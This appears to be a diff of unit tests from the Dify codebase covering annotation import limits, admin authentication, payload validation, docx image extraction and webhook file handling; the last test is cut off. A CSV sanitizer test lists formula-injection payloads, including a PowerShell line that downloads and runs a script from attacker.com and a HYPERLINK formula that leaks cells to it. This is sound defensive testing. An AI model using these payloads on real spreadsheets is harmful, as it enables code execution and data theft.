"""Mock application object."""
app = MagicMock()
app.id = "app_id"
return app
@pytest.fixture
def mock_db_session(self):
"""Mock database session."""
with patch("services.annotation_service.db.session") as mock:
yield mock
def test_max_records_limit_enforced(self, mock_app, mock_db_session):
"""Test that files with too many records are rejected."""
from services.annotation_service import AppAnnotationService
# Create CSV with too many records
max_records = dify_config.ANNOTATION_IMPORT_MAX_RECORDS
csv_content = "question,answer\n"
for i in range(max_records + 100):
csv_content += f"Question {i},Answer {i}\n"
file = FileStorage(stream=io.BytesIO(csv_content.encode()), filename="test.csv", content_type="text/csv")
mock_db_session.query.return_value.where.return_value.first.return_value = mock_app
with patch("services.annotation_service.current_account_with_tenant") as mock_auth:
mock_auth.return_value = (MagicMock(id="user_id"), "tenant_id")
with patch("services.annotation_service.FeatureService") as mock_features:
mock_features.get_features.return_value.billing.enabled = False
result = AppAnnotationService.batch_import_app_annotations("app_id", file)
# Should return error about too many records
assert "error_msg" in result
assert "too many" in result["error_msg"].lower() or "maximum" in result["error_msg"].lower()
def test_min_records_limit_enforced(self, mock_app, mock_db_session):
"""Test that files with too few valid records are rejected."""
from services.annotation_service import AppAnnotationService
# Create CSV with only header (no data rows)
csv_content = "question,answer\n"
file = FileStorage(stream=io.BytesIO(csv_content.encode()), filename="test.csv", content_type="text/csv")
mock_db_session.query.return_value.where.return_value.first.return_value = mock_app
with patch("services.annotation_service.current_account_with_tenant") as mock_auth:
mock_auth.return_value = (MagicMock(id="user_id"), "tenant_id")
result = AppAnnotationService.batch_import_app_annotations("app_id", file)
# Should return error about insufficient records
assert "error_msg" in result
assert "at least" in result["error_msg"].lower() or "minimum" in result["error_msg"].lower()
def test_invalid_csv_format_handled(self, mock_app, mock_db_session):
"""Test that invalid CSV format is handled gracefully."""
from services.annotation_service import AppAnnotationService
# Any content is fine once we force ParserError
csv_content = 'invalid,csv,format\nwith,unbalanced,quotes,and"stuff'
file = FileStorage(stream=io.BytesIO(csv_content.encode()), filename="test.csv", content_type="text/csv")
mock_db_session.query.return_value.where.return_value.first.return_value = mock_app
with (
patch("services.annotation_service.current_account_with_tenant") as mock_auth,
patch("services.annotation_service.pd.read_csv", side_effect=ParserError("malformed CSV")),
):
mock_auth.return_value = (MagicMock(id="user_id"), "tenant_id")
result = AppAnnotationService.batch_import_app_annotations("app_id", file)
assert "error_msg" in result
assert "malformed" in result["error_msg"].lower()
def test_valid_import_succeeds(self, mock_app, mock_db_session):
"""Test that valid import request succeeds."""
from services.annotation_service import AppAnnotationService
# Create valid CSV
csv_content = "question,answer\nWhat is AI?,Artificial Intelligence\nWhat is ML?,Machine Learning\n"
file = FileStorage(stream=io.BytesIO(csv_content.encode()), filename="test.csv", content_type="text/csv")
mock_db_session.query.return_value.where.return_value.first.return_value = mock_app
with patch("services.annotation_service.current_account_with_tenant") as mock_auth:
mock_auth.return_value = (MagicMock(id="user_id"), "tenant_id")
with patch("services.annotation_service.FeatureService") as mock_features:
mock_features.get_features.return_value.billing.enabled = False
with patch("services.annotation_service.batch_import_annotations_task") as mock_task:
with patch("services.annotation_service.redis_client"):
result = AppAnnotationService.batch_import_app_annotations("app_id", file)
# Should return success response
assert "job_id" in result
assert "job_status" in result
assert result["job_status"] == "waiting"
assert "record_count" in result
assert result["record_count"] == 2
class TestAnnotationImportTaskOptimization:
"""Test optimizations in batch import task."""
def test_task_has_timeout_configured(self):
"""Test that task has proper timeout configuration."""
from tasks.annotation.batch_import_annotations_task import batch_import_annotations_task
# Verify task configuration
assert hasattr(batch_import_annotations_task, "time_limit")
assert hasattr(batch_import_annotations_task, "soft_time_limit")
# Check timeout values are reasonable
# Hard limit should be 6 minutes (360s)
# Soft limit should be 5 minutes (300s)
# Note: actual values depend on Celery configuration
class TestConfigurationValues:
"""Test that security configuration values are properly set."""
def test_rate_limit_configs_exist(self):
"""Test that rate limit configurations are defined."""
assert hasattr(dify_config, "ANNOTATION_IMPORT_RATE_LIMIT_PER_MINUTE")
assert hasattr(dify_config, "ANNOTATION_IMPORT_RATE_LIMIT_PER_HOUR")
assert dify_config.ANNOTATION_IMPORT_RATE_LIMIT_PER_MINUTE > 0
assert dify_config.ANNOTATION_IMPORT_RATE_LIMIT_PER_HOUR > 0
def test_file_size_limit_config_exists(self):
"""Test that file size limit configuration is defined."""
assert hasattr(dify_config, "ANNOTATION_IMPORT_FILE_SIZE_LIMIT")
assert dify_config.ANNOTATION_IMPORT_FILE_SIZE_LIMIT > 0
assert dify_config.ANNOTATION_IMPORT_FILE_SIZE_LIMIT <= 10 # Reasonable max (10MB)
def test_record_limit_configs_exist(self):
"""Test that record limit configurations are defined."""
assert hasattr(dify_config, "ANNOTATION_IMPORT_MAX_RECORDS")
assert hasattr(dify_config, "ANNOTATION_IMPORT_MIN_RECORDS")
assert dify_config.ANNOTATION_IMPORT_MAX_RECORDS > 0
assert dify_config.ANNOTATION_IMPORT_MIN_RECORDS > 0
assert dify_config.ANNOTATION_IMPORT_MIN_RECORDS < dify_config.ANNOTATION_IMPORT_MAX_RECORDS
def test_concurrency_limit_config_exists(self):
"""Test that concurrency limit configuration is defined."""
assert hasattr(dify_config, "ANNOTATION_IMPORT_MAX_CONCURRENT")
assert dify_config.ANNOTATION_IMPORT_MAX_CONCURRENT > 0
assert dify_config.ANNOTATION_IMPORT_MAX_CONCURRENT <= 10 # Reasonable upper bound

View File

@ -0,0 +1,407 @@
"""Final working unit tests for admin endpoints - tests business logic directly."""
import uuid
from unittest.mock import Mock, patch
import pytest
from werkzeug.exceptions import NotFound, Unauthorized
from controllers.console.admin import InsertExploreAppPayload
from models.model import App, RecommendedApp
class TestInsertExploreAppPayload:
"""Test InsertExploreAppPayload validation."""
def test_valid_payload(self):
"""Test creating payload with valid data."""
payload_data = {
"app_id": str(uuid.uuid4()),
"desc": "Test app description",
"copyright": "© 2024 Test Company",
"privacy_policy": "https://example.com/privacy",
"custom_disclaimer": "Custom disclaimer text",
"language": "en-US",
"category": "Productivity",
"position": 1,
}
payload = InsertExploreAppPayload.model_validate(payload_data)
assert payload.app_id == payload_data["app_id"]
assert payload.desc == payload_data["desc"]
assert payload.copyright == payload_data["copyright"]
assert payload.privacy_policy == payload_data["privacy_policy"]
assert payload.custom_disclaimer == payload_data["custom_disclaimer"]
assert payload.language == payload_data["language"]
assert payload.category == payload_data["category"]
assert payload.position == payload_data["position"]
def test_minimal_payload(self):
"""Test creating payload with only required fields."""
payload_data = {
"app_id": str(uuid.uuid4()),
"language": "en-US",
"category": "Productivity",
"position": 1,
}
payload = InsertExploreAppPayload.model_validate(payload_data)
assert payload.app_id == payload_data["app_id"]
assert payload.desc is None
assert payload.copyright is None
assert payload.privacy_policy is None
assert payload.custom_disclaimer is None
assert payload.language == payload_data["language"]
assert payload.category == payload_data["category"]
assert payload.position == payload_data["position"]
def test_invalid_language(self):
"""Test payload with invalid language code."""
payload_data = {
"app_id": str(uuid.uuid4()),
"language": "invalid-lang",
"category": "Productivity",
"position": 1,
}
with pytest.raises(ValueError, match="invalid-lang is not a valid language"):
InsertExploreAppPayload.model_validate(payload_data)
class TestAdminRequiredDecorator:
"""Test admin_required decorator."""
def setup_method(self):
"""Set up test fixtures."""
# Mock dify_config
self.dify_config_patcher = patch("controllers.console.admin.dify_config")
self.mock_dify_config = self.dify_config_patcher.start()
self.mock_dify_config.ADMIN_API_KEY = "test-admin-key"
# Mock extract_access_token
self.token_patcher = patch("controllers.console.admin.extract_access_token")
self.mock_extract_token = self.token_patcher.start()
def teardown_method(self):
"""Clean up test fixtures."""
self.dify_config_patcher.stop()
self.token_patcher.stop()
def test_admin_required_success(self):
"""Test successful admin authentication."""
from controllers.console.admin import admin_required
@admin_required
def test_view():
return {"success": True}
self.mock_extract_token.return_value = "test-admin-key"
result = test_view()
assert result["success"] is True
def test_admin_required_invalid_token(self):
"""Test admin_required with invalid token."""
from controllers.console.admin import admin_required
@admin_required
def test_view():
return {"success": True}
self.mock_extract_token.return_value = "wrong-key"
with pytest.raises(Unauthorized, match="API key is invalid"):
test_view()
def test_admin_required_no_api_key_configured(self):
"""Test admin_required when no API key is configured."""
from controllers.console.admin import admin_required
self.mock_dify_config.ADMIN_API_KEY = None
@admin_required
def test_view():
return {"success": True}
with pytest.raises(Unauthorized, match="API key is invalid"):
test_view()
def test_admin_required_missing_authorization_header(self):
"""Test admin_required with missing authorization header."""
from controllers.console.admin import admin_required
@admin_required
def test_view():
return {"success": True}
self.mock_extract_token.return_value = None
with pytest.raises(Unauthorized, match="Authorization header is missing"):
test_view()
class TestExploreAppBusinessLogicDirect:
"""Test the core business logic of explore app management directly."""
def test_data_fusion_logic(self):
"""Test the data fusion logic between payload and site data."""
# Test cases for different data scenarios
test_cases = [
{
"name": "site_data_overrides_payload",
"payload": {"desc": "Payload desc", "copyright": "Payload copyright"},
"site": {"description": "Site desc", "copyright": "Site copyright"},
"expected": {
"desc": "Site desc",
"copyright": "Site copyright",
"privacy_policy": "",
"custom_disclaimer": "",
},
},
{
"name": "payload_used_when_no_site",
"payload": {"desc": "Payload desc", "copyright": "Payload copyright"},
"site": None,
"expected": {
"desc": "Payload desc",
"copyright": "Payload copyright",
"privacy_policy": "",
"custom_disclaimer": "",
},
},
{
"name": "empty_defaults_when_no_data",
"payload": {},
"site": None,
"expected": {"desc": "", "copyright": "", "privacy_policy": "", "custom_disclaimer": ""},
},
]
for case in test_cases:
# Simulate the data fusion logic
payload_desc = case["payload"].get("desc")
payload_copyright = case["payload"].get("copyright")
payload_privacy_policy = case["payload"].get("privacy_policy")
payload_custom_disclaimer = case["payload"].get("custom_disclaimer")
if case["site"]:
site_desc = case["site"].get("description")
site_copyright = case["site"].get("copyright")
site_privacy_policy = case["site"].get("privacy_policy")
site_custom_disclaimer = case["site"].get("custom_disclaimer")
# Site data takes precedence
desc = site_desc or payload_desc or ""
copyright = site_copyright or payload_copyright or ""
privacy_policy = site_privacy_policy or payload_privacy_policy or ""
custom_disclaimer = site_custom_disclaimer or payload_custom_disclaimer or ""
else:
# Use payload data or empty defaults
desc = payload_desc or ""
copyright = payload_copyright or ""
privacy_policy = payload_privacy_policy or ""
custom_disclaimer = payload_custom_disclaimer or ""
result = {
"desc": desc,
"copyright": copyright,
"privacy_policy": privacy_policy,
"custom_disclaimer": custom_disclaimer,
}
assert result == case["expected"], f"Failed test case: {case['name']}"
def test_app_visibility_logic(self):
"""Test that apps are made public when added to explore list."""
# Create a mock app
mock_app = Mock(spec=App)
mock_app.is_public = False
# Simulate the business logic
mock_app.is_public = True
assert mock_app.is_public is True
def test_recommended_app_creation_logic(self):
"""Test the creation of RecommendedApp objects."""
app_id = str(uuid.uuid4())
payload_data = {
"app_id": app_id,
"desc": "Test app description",
"copyright": "© 2024 Test Company",
"privacy_policy": "https://example.com/privacy",
"custom_disclaimer": "Custom disclaimer",
"language": "en-US",
"category": "Productivity",
"position": 1,
}
# Simulate the creation logic
recommended_app = Mock(spec=RecommendedApp)
recommended_app.app_id = payload_data["app_id"]
recommended_app.description = payload_data["desc"]
recommended_app.copyright = payload_data["copyright"]
recommended_app.privacy_policy = payload_data["privacy_policy"]
recommended_app.custom_disclaimer = payload_data["custom_disclaimer"]
recommended_app.language = payload_data["language"]
recommended_app.category = payload_data["category"]
recommended_app.position = payload_data["position"]
# Verify the data
assert recommended_app.app_id == app_id
assert recommended_app.description == "Test app description"
assert recommended_app.copyright == "© 2024 Test Company"
assert recommended_app.privacy_policy == "https://example.com/privacy"
assert recommended_app.custom_disclaimer == "Custom disclaimer"
assert recommended_app.language == "en-US"
assert recommended_app.category == "Productivity"
assert recommended_app.position == 1
def test_recommended_app_update_logic(self):
"""Test the update logic for existing RecommendedApp objects."""
mock_recommended_app = Mock(spec=RecommendedApp)
update_data = {
"desc": "Updated description",
"copyright": "© 2024 Updated",
"language": "fr-FR",
"category": "Tools",
"position": 2,
}
# Simulate the update logic
mock_recommended_app.description = update_data["desc"]
mock_recommended_app.copyright = update_data["copyright"]
mock_recommended_app.language = update_data["language"]
mock_recommended_app.category = update_data["category"]
mock_recommended_app.position = update_data["position"]
# Verify the updates
assert mock_recommended_app.description == "Updated description"
assert mock_recommended_app.copyright == "© 2024 Updated"
assert mock_recommended_app.language == "fr-FR"
assert mock_recommended_app.category == "Tools"
assert mock_recommended_app.position == 2
def test_app_not_found_error_logic(self):
"""Test error handling when app is not found."""
app_id = str(uuid.uuid4())
# Simulate app lookup returning None
found_app = None
# Test the error condition
if not found_app:
with pytest.raises(NotFound, match=f"App '{app_id}' is not found"):
raise NotFound(f"App '{app_id}' is not found")
def test_recommended_app_not_found_error_logic(self):
"""Test error handling when recommended app is not found for deletion."""
app_id = str(uuid.uuid4())
# Simulate recommended app lookup returning None
found_recommended_app = None
# Test the error condition
if not found_recommended_app:
with pytest.raises(NotFound, match=f"App '{app_id}' is not found in the explore list"):
raise NotFound(f"App '{app_id}' is not found in the explore list")
def test_database_session_usage_patterns(self):
"""Test the expected database session usage patterns."""
# Mock session usage patterns
mock_session = Mock()
# Test session.add pattern
mock_recommended_app = Mock(spec=RecommendedApp)
mock_session.add(mock_recommended_app)
mock_session.commit()
# Verify session was used correctly
mock_session.add.assert_called_once_with(mock_recommended_app)
mock_session.commit.assert_called_once()
# Test session.delete pattern
mock_recommended_app_to_delete = Mock(spec=RecommendedApp)
mock_session.delete(mock_recommended_app_to_delete)
mock_session.commit()
# Verify delete pattern
mock_session.delete.assert_called_once_with(mock_recommended_app_to_delete)
def test_payload_validation_integration(self):
"""Test payload validation in the context of the business logic."""
# Test valid payload
valid_payload_data = {
"app_id": str(uuid.uuid4()),
"desc": "Test app description",
"language": "en-US",
"category": "Productivity",
"position": 1,
}
# This should succeed
payload = InsertExploreAppPayload.model_validate(valid_payload_data)
assert payload.app_id == valid_payload_data["app_id"]
# Test invalid payload
invalid_payload_data = {
"app_id": str(uuid.uuid4()),
"language": "invalid-lang", # This should fail validation
"category": "Productivity",
"position": 1,
}
# This should raise an exception
with pytest.raises(ValueError, match="invalid-lang is not a valid language"):
InsertExploreAppPayload.model_validate(invalid_payload_data)
class TestExploreAppDataHandling:
"""Test specific data handling scenarios."""
def test_uuid_validation(self):
"""Test UUID validation and handling."""
# Test valid UUID
valid_uuid = str(uuid.uuid4())
# This should be a valid UUID
assert uuid.UUID(valid_uuid) is not None
# Test invalid UUID
invalid_uuid = "not-a-valid-uuid"
# This should raise a ValueError
with pytest.raises(ValueError):
uuid.UUID(invalid_uuid)
def test_language_validation(self):
"""Test language validation against supported languages."""
from constants.languages import supported_language
# Test supported language
assert supported_language("en-US") == "en-US"
assert supported_language("fr-FR") == "fr-FR"
# Test unsupported language
with pytest.raises(ValueError, match="invalid-lang is not a valid language"):
supported_language("invalid-lang")
def test_response_formatting(self):
"""Test API response formatting."""
# Test success responses
create_response = {"result": "success"}
update_response = {"result": "success"}
delete_response = None # 204 No Content returns None
assert create_response["result"] == "success"
assert update_response["result"] == "success"
assert delete_response is None
# Test status codes
create_status = 201 # Created
update_status = 200 # OK
delete_status = 204 # No Content
assert create_status == 201
assert update_status == 200
assert delete_status == 204

View File

@ -0,0 +1,20 @@
import pytest
from pydantic import ValidationError
from controllers.console.explore.conversation import ConversationRenamePayload as ConsolePayload
from controllers.service_api.app.conversation import ConversationRenamePayload as ServicePayload
@pytest.mark.parametrize("payload_cls", [ConsolePayload, ServicePayload])
def test_payload_allows_auto_generate_without_name(payload_cls):
payload = payload_cls.model_validate({"auto_generate": True})
assert payload.auto_generate is True
assert payload.name is None
@pytest.mark.parametrize("payload_cls", [ConsolePayload, ServicePayload])
@pytest.mark.parametrize("value", [None, "", " "])
def test_payload_requires_name_when_not_auto_generate(payload_cls, value):
with pytest.raises(ValidationError):
payload_cls.model_validate({"name": value, "auto_generate": False})

View File

@ -0,0 +1,151 @@
"""Unit tests for CSV sanitizer."""
from core.helper.csv_sanitizer import CSVSanitizer
class TestCSVSanitizer:
"""Test cases for CSV sanitization to prevent formula injection attacks."""
def test_sanitize_formula_equals(self):
"""Test sanitizing values starting with = (most common formula injection)."""
assert CSVSanitizer.sanitize_value("=cmd|'/c calc'!A0") == "'=cmd|'/c calc'!A0"
assert CSVSanitizer.sanitize_value("=SUM(A1:A10)") == "'=SUM(A1:A10)"
assert CSVSanitizer.sanitize_value("=1+1") == "'=1+1"
assert CSVSanitizer.sanitize_value("=@SUM(1+1)") == "'=@SUM(1+1)"
def test_sanitize_formula_plus(self):
"""Test sanitizing values starting with + (plus formula injection)."""
assert CSVSanitizer.sanitize_value("+1+1+cmd|'/c calc") == "'+1+1+cmd|'/c calc"
assert CSVSanitizer.sanitize_value("+123") == "'+123"
assert CSVSanitizer.sanitize_value("+cmd|'/c calc'!A0") == "'+cmd|'/c calc'!A0"
def test_sanitize_formula_minus(self):
"""Test sanitizing values starting with - (minus formula injection)."""
assert CSVSanitizer.sanitize_value("-2+3+cmd|'/c calc") == "'-2+3+cmd|'/c calc"
assert CSVSanitizer.sanitize_value("-456") == "'-456"
assert CSVSanitizer.sanitize_value("-cmd|'/c notepad") == "'-cmd|'/c notepad"
def test_sanitize_formula_at(self):
"""Test sanitizing values starting with @ (at-sign formula injection)."""
assert CSVSanitizer.sanitize_value("@SUM(1+1)*cmd|'/c calc") == "'@SUM(1+1)*cmd|'/c calc"
assert CSVSanitizer.sanitize_value("@AVERAGE(1,2,3)") == "'@AVERAGE(1,2,3)"
def test_sanitize_formula_tab(self):
"""Test sanitizing values starting with tab character."""
assert CSVSanitizer.sanitize_value("\t=1+1") == "'\t=1+1"
assert CSVSanitizer.sanitize_value("\tcalc") == "'\tcalc"
def test_sanitize_formula_carriage_return(self):
"""Test sanitizing values starting with carriage return."""
assert CSVSanitizer.sanitize_value("\r=1+1") == "'\r=1+1"
assert CSVSanitizer.sanitize_value("\rcmd") == "'\rcmd"
def test_sanitize_safe_values(self):
"""Test that safe values are not modified."""
assert CSVSanitizer.sanitize_value("Hello World") == "Hello World"
assert CSVSanitizer.sanitize_value("123") == "123"
assert CSVSanitizer.sanitize_value("test@example.com") == "test@example.com"
assert CSVSanitizer.sanitize_value("Normal text") == "Normal text"
assert CSVSanitizer.sanitize_value("Question: How are you?") == "Question: How are you?"
def test_sanitize_safe_values_with_special_chars_in_middle(self):
"""Test that special characters in the middle are not escaped."""
assert CSVSanitizer.sanitize_value("A = B + C") == "A = B + C"
assert CSVSanitizer.sanitize_value("Price: $10 + $20") == "Price: $10 + $20"
assert CSVSanitizer.sanitize_value("Email: user@domain.com") == "Email: user@domain.com"
def test_sanitize_empty_values(self):
"""Test handling of empty values."""
assert CSVSanitizer.sanitize_value("") == ""
assert CSVSanitizer.sanitize_value(None) == ""
def test_sanitize_numeric_types(self):
"""Test handling of numeric types."""
assert CSVSanitizer.sanitize_value(123) == "123"
assert CSVSanitizer.sanitize_value(456.789) == "456.789"
assert CSVSanitizer.sanitize_value(0) == "0"
# Negative numbers should be escaped (start with -)
assert CSVSanitizer.sanitize_value(-123) == "'-123"
def test_sanitize_boolean_types(self):
"""Test handling of boolean types."""
assert CSVSanitizer.sanitize_value(True) == "True"
assert CSVSanitizer.sanitize_value(False) == "False"
def test_sanitize_dict_with_specific_fields(self):
"""Test sanitizing specific fields in a dictionary."""
data = {
"question": "=1+1",
"answer": "+cmd|'/c calc",
"safe_field": "Normal text",
"id": "12345",
}
sanitized = CSVSanitizer.sanitize_dict(data, ["question", "answer"])
assert sanitized["question"] == "'=1+1"
assert sanitized["answer"] == "'+cmd|'/c calc"
assert sanitized["safe_field"] == "Normal text"
assert sanitized["id"] == "12345"
def test_sanitize_dict_all_string_fields(self):
"""Test sanitizing all string fields when no field list provided."""
data = {
"question": "=1+1",
"answer": "+calc",
"id": 123, # Not a string, should be ignored
}
sanitized = CSVSanitizer.sanitize_dict(data, None)
assert sanitized["question"] == "'=1+1"
assert sanitized["answer"] == "'+calc"
assert sanitized["id"] == 123 # Unchanged
def test_sanitize_dict_with_missing_fields(self):
"""Test that missing fields in dict don't cause errors."""
data = {"question": "=1+1"}
sanitized = CSVSanitizer.sanitize_dict(data, ["question", "nonexistent_field"])
assert sanitized["question"] == "'=1+1"
assert "nonexistent_field" not in sanitized
def test_sanitize_dict_creates_copy(self):
"""Test that sanitize_dict creates a copy and doesn't modify original."""
original = {"question": "=1+1", "answer": "Normal"}
sanitized = CSVSanitizer.sanitize_dict(original, ["question"])
assert original["question"] == "=1+1" # Original unchanged
assert sanitized["question"] == "'=1+1" # Copy sanitized
def test_real_world_csv_injection_payloads(self):
"""Test against real-world CSV injection attack payloads."""
# Common DDE (Dynamic Data Exchange) attack payloads
payloads = [
"=cmd|'/c calc'!A0",
"=cmd|'/c notepad'!A0",
"+cmd|'/c powershell IEX(wget attacker.com/malware.ps1)'",
"-2+3+cmd|'/c calc'",
"@SUM(1+1)*cmd|'/c calc'",
"=1+1+cmd|'/c calc'",
'=HYPERLINK("http://attacker.com?leak="&A1&A2,"Click here")',
]
for payload in payloads:
result = CSVSanitizer.sanitize_value(payload)
# All should be prefixed with single quote
assert result.startswith("'"), f"Payload not sanitized: {payload}"
assert result == f"'{payload}", f"Unexpected sanitization for: {payload}"
def test_multiline_strings(self):
"""Test handling of multiline strings."""
multiline = "Line 1\nLine 2\nLine 3"
assert CSVSanitizer.sanitize_value(multiline) == multiline
multiline_with_formula = "=SUM(A1)\nLine 2"
assert CSVSanitizer.sanitize_value(multiline_with_formula) == f"'{multiline_with_formula}"
def test_whitespace_only_strings(self):
"""Test handling of whitespace-only strings."""
assert CSVSanitizer.sanitize_value(" ") == " "
assert CSVSanitizer.sanitize_value("\n\n") == "\n\n"
# Tab at start should be escaped
assert CSVSanitizer.sanitize_value("\t ") == "'\t "

View File

@ -1,7 +1,10 @@
"""Primarily used for testing merged cell scenarios"""
from types import SimpleNamespace
from docx import Document
import core.rag.extractor.word_extractor as we
from core.rag.extractor.word_extractor import WordExtractor
@ -47,3 +50,85 @@ def test_parse_row():
extractor = object.__new__(WordExtractor)
for idx, row in enumerate(table.rows):
assert extractor._parse_row(row, {}, 3) == gt[idx]
def test_extract_images_from_docx(monkeypatch):
external_bytes = b"ext-bytes"
internal_bytes = b"int-bytes"
# Patch storage.save to capture writes
saves: list[tuple[str, bytes]] = []
def save(key: str, data: bytes):
saves.append((key, data))
monkeypatch.setattr(we, "storage", SimpleNamespace(save=save))
# Patch db.session to record adds/commit
class DummySession:
def __init__(self):
self.added = []
self.committed = False
def add(self, obj):
self.added.append(obj)
def commit(self):
self.committed = True
db_stub = SimpleNamespace(session=DummySession())
monkeypatch.setattr(we, "db", db_stub)
# Patch config values used for URL composition and storage type
monkeypatch.setattr(we.dify_config, "FILES_URL", "http://files.local", raising=False)
monkeypatch.setattr(we.dify_config, "STORAGE_TYPE", "local", raising=False)
# Patch UploadFile to avoid real DB models
class FakeUploadFile:
_i = 0
def __init__(self, **kwargs): # kwargs match the real signature fields
type(self)._i += 1
self.id = f"u{self._i}"
monkeypatch.setattr(we, "UploadFile", FakeUploadFile)
# Patch external image fetcher
def fake_get(url: str):
assert url == "https://example.com/image.png"
return SimpleNamespace(status_code=200, headers={"Content-Type": "image/png"}, content=external_bytes)
monkeypatch.setattr(we, "ssrf_proxy", SimpleNamespace(get=fake_get))
# A hashable internal part object with a blob attribute
class HashablePart:
def __init__(self, blob: bytes):
self.blob = blob
def __hash__(self) -> int: # ensure it can be used as a dict key like real docx parts
return id(self)
# Build a minimal doc object with both external and internal image rels
internal_part = HashablePart(blob=internal_bytes)
rel_ext = SimpleNamespace(is_external=True, target_ref="https://example.com/image.png")
rel_int = SimpleNamespace(is_external=False, target_ref="word/media/image1.png", target_part=internal_part)
doc = SimpleNamespace(part=SimpleNamespace(rels={"rId1": rel_ext, "rId2": rel_int}))
extractor = object.__new__(WordExtractor)
extractor.tenant_id = "t1"
extractor.user_id = "u1"
image_map = extractor._extract_images_from_docx(doc)
# Returned map should contain entries for external (keyed by rId) and internal (keyed by target_part)
assert set(image_map.keys()) == {"rId1", internal_part}
assert all(v.startswith("![image](") and v.endswith("/file-preview)") for v in image_map.values())
# Storage should receive both payloads
payloads = {data for _, data in saves}
assert external_bytes in payloads
assert internal_bytes in payloads
# DB interactions should be recorded
assert len(db_stub.session.added) == 2
assert db_stub.session.committed is True

View File

@ -0,0 +1,86 @@
import pytest
import core.tools.utils.message_transformer as mt
from core.tools.entities.tool_entities import ToolInvokeMessage
class _FakeToolFile:
def __init__(self, mimetype: str):
self.id = "fake-tool-file-id"
self.mimetype = mimetype
class _FakeToolFileManager:
"""Fake ToolFileManager to capture the mimetype passed in."""
last_call: dict | None = None
def __init__(self, *args, **kwargs):
pass
def create_file_by_raw(
self,
*,
user_id: str,
tenant_id: str,
conversation_id: str | None,
file_binary: bytes,
mimetype: str,
filename: str | None = None,
):
type(self).last_call = {
"user_id": user_id,
"tenant_id": tenant_id,
"conversation_id": conversation_id,
"file_binary": file_binary,
"mimetype": mimetype,
"filename": filename,
}
return _FakeToolFile(mimetype)
@pytest.fixture(autouse=True)
def _patch_tool_file_manager(monkeypatch):
# Patch the manager used inside the transformer module
monkeypatch.setattr(mt, "ToolFileManager", _FakeToolFileManager)
# also ensure predictable URL generation (no need to patch; uses id and extension only)
yield
_FakeToolFileManager.last_call = None
def _gen(messages):
yield from messages
def test_transform_tool_invoke_messages_mimetype_key_present_but_none():
# Arrange: a BLOB message whose meta contains a mime_type key set to None
blob = b"hello"
msg = ToolInvokeMessage(
type=ToolInvokeMessage.MessageType.BLOB,
message=ToolInvokeMessage.BlobMessage(blob=blob),
meta={"mime_type": None, "filename": "greeting"},
)
# Act
out = list(
mt.ToolFileMessageTransformer.transform_tool_invoke_messages(
messages=_gen([msg]),
user_id="u1",
tenant_id="t1",
conversation_id="c1",
)
)
# Assert: default to application/octet-stream when mime_type is present but None
assert _FakeToolFileManager.last_call is not None
assert _FakeToolFileManager.last_call["mimetype"] == "application/octet-stream"
# Should yield a BINARY_LINK (not IMAGE_LINK) and the URL ends with .bin
assert len(out) == 1
o = out[0]
assert o.type == ToolInvokeMessage.MessageType.BINARY_LINK
assert isinstance(o.message, ToolInvokeMessage.TextMessage)
assert o.message.text.endswith(".bin")
# meta is preserved (still contains mime_type: None)
assert "mime_type" in (o.meta or {})
assert o.meta["mime_type"] is None

View File

@ -0,0 +1,452 @@
"""
Unit tests for webhook file conversion fix.
This test verifies that webhook trigger nodes properly convert file dictionaries
to FileVariable objects, fixing the "Invalid variable type: ObjectVariable" error
when passing files to downstream LLM nodes.
"""
from unittest.mock import Mock, patch
from core.app.entities.app_invoke_entities import InvokeFrom
from core.workflow.entities.graph_init_params import GraphInitParams
from core.workflow.entities.workflow_node_execution import WorkflowNodeExecutionStatus
from core.workflow.nodes.trigger_webhook.entities import (
ContentType,
Method,
WebhookBodyParameter,
WebhookData,
)
from core.workflow.nodes.trigger_webhook.node import TriggerWebhookNode
from core.workflow.runtime.graph_runtime_state import GraphRuntimeState
from core.workflow.runtime.variable_pool import VariablePool
from core.workflow.system_variable import SystemVariable
from models.enums import UserFrom
from models.workflow import WorkflowType
def create_webhook_node(
webhook_data: WebhookData,
variable_pool: VariablePool,
tenant_id: str = "test-tenant",
) -> TriggerWebhookNode:
"""Helper function to create a webhook node with proper initialization."""
node_config = {
"id": "webhook-node-1",
"data": webhook_data.model_dump(),
}
graph_init_params = GraphInitParams(
tenant_id=tenant_id,
app_id="test-app",
workflow_type=WorkflowType.WORKFLOW,
workflow_id="test-workflow",
graph_config={},
user_id="test-user",
user_from=UserFrom.ACCOUNT,
invoke_from=InvokeFrom.SERVICE_API,
call_depth=0,
)
runtime_state = GraphRuntimeState(
variable_pool=variable_pool,
start_at=0,
)
node = TriggerWebhookNode(
id="webhook-node-1",
config=node_config,
graph_init_params=graph_init_params,
graph_runtime_state=runtime_state,
)
# Attach a lightweight app_config onto runtime state for tenant lookups
runtime_state.app_config = Mock()
runtime_state.app_config.tenant_id = tenant_id
# Provide compatibility alias expected by node implementation
# Some nodes reference `self.node_id`; expose it as an alias to `self.id` for tests
node.node_id = node.id
return node
def create_test_file_dict(
filename: str = "test.jpg",
file_type: str = "image",
transfer_method: str = "local_file",
) -> dict:
"""Create a test file dictionary as it would come from webhook service."""
return {
"id": "file-123",
"tenant_id": "test-tenant",
"type": file_type,
"filename": filename,
"extension": ".jpg",
"mime_type": "image/jpeg",
"transfer_method": transfer_method,
"related_id": "related-123",
"storage_key": "storage-key-123",
"size": 1024,
"url": "https://example.com/test.jpg",
"created_at": 1234567890,
"used_at": None,
"hash": "file-hash-123",
}
def test_webhook_node_file_conversion_to_file_variable():
"""Test that webhook node converts file dictionaries to FileVariable objects."""
# Create test file dictionary (as it comes from webhook service)
file_dict = create_test_file_dict("uploaded_image.jpg")
data = WebhookData(
title="Test Webhook with File",
method=Method.POST,
content_type=ContentType.FORM_DATA,
body=[
WebhookBodyParameter(name="image_upload", type="file", required=True),
WebhookBodyParameter(name="message", type="string", required=False),
],
)
variable_pool = VariablePool(
system_variables=SystemVariable.empty(),
user_inputs={
"webhook_data": {
"headers": {},
"query_params": {},
"body": {"message": "Test message"},
"files": {
"image_upload": file_dict,
},
}
},
)
node = create_webhook_node(data, variable_pool)
# Mock the file factory and variable factory
with (
patch("factories.file_factory.build_from_mapping") as mock_file_factory,
patch("core.workflow.nodes.trigger_webhook.node.build_segment_with_type") as mock_segment_factory,
patch("core.workflow.nodes.trigger_webhook.node.FileVariable") as mock_file_variable,
):
# Setup mocks
mock_file_obj = Mock()
mock_file_obj.to_dict.return_value = file_dict
mock_file_factory.return_value = mock_file_obj
mock_segment = Mock()
mock_segment.value = mock_file_obj
mock_segment_factory.return_value = mock_segment
mock_file_var_instance = Mock()
mock_file_variable.return_value = mock_file_var_instance
# Run the node
result = node._run()
# Verify successful execution
